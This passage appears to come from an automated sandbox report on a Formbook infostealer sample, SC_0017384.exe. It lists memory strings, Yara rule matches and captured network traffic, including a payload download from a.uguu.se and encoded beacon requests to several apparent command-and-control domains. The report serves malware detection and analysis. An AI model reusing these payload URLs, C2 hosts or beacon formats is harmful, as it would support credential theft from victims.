          Source: explorer.exe, 00000004.00000002.594853816.00000000160EE000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005E0E000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.madisoncountylincoln.com/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.madisoncountylincoln.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.madisoncountylincoln.comwww.madisoncountylincoln.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mejawajib.shop
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mejawajib.shop/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mejawajib.shopwww.mejawajib.shop
          Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.metatv.app
          Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.metatv.app/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.metatv.appwww.metatv.app
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mnsmanagmentsolutions.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mnsmanagmentsolutions.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.myprojoints.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.myprojoints.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.myprojoints.comwww.myprojoints.com
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.pinterest.com/casarpontocom
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rw-bau.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rw-bau.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rw-bau.comwww.rw-bau.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sistemadanetflix.site
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sistemadanetflix.site/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sistemadanetflix.sitewww.sistemadanetflix.site
          Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://a.uguu.se/fwvfviJb.dat
          Source: SC_0017384.exe, Lvdnyvcvr.exe.0.dr | String found in binary or memory: https://a.uguu.se/fwvfviJb.dat=
          Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://a.uguu.se4Dp
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ajuda.casar.com
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137c
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://embed.typeform.com/embed.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://plus.google.com/
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://urn.to/r/sds_see5bad
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.casar.com
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.casar.com/assunto/organizacao/
          Source: M61Ae5o9b.8.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
          Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/json
          Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/casarpontocom
          Source: unknown | HTTP traffic detected: POST /t4np/ HTTP/1.1
            Host: www.emprendizajesocial.com
            Connection: close
            Content-Length: 190
            Cache-Control: no-cache
            Origin: http://www.emprendizajesocial.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.emprendizajesocial.com/t4np/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Data Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00
            Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
          Source: unknown | DNS traffic detected: queries for: a.uguu.se
          Source: global traffic | HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1
            Host: a.uguu.se
            Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1
            Host: a.uguu.se
            Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1
            Host: a.uguu.se
            Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1
            Host: www.findmyoriginstory.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1
            Host: www.emprendizajesocial.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1
            Host: www.brunaeleandro.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1
            Host: www.madisoncountylincoln.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1
            Host: www.metatv.app
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: unknown | HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          Source: Yara match | File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: SC_0017384.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
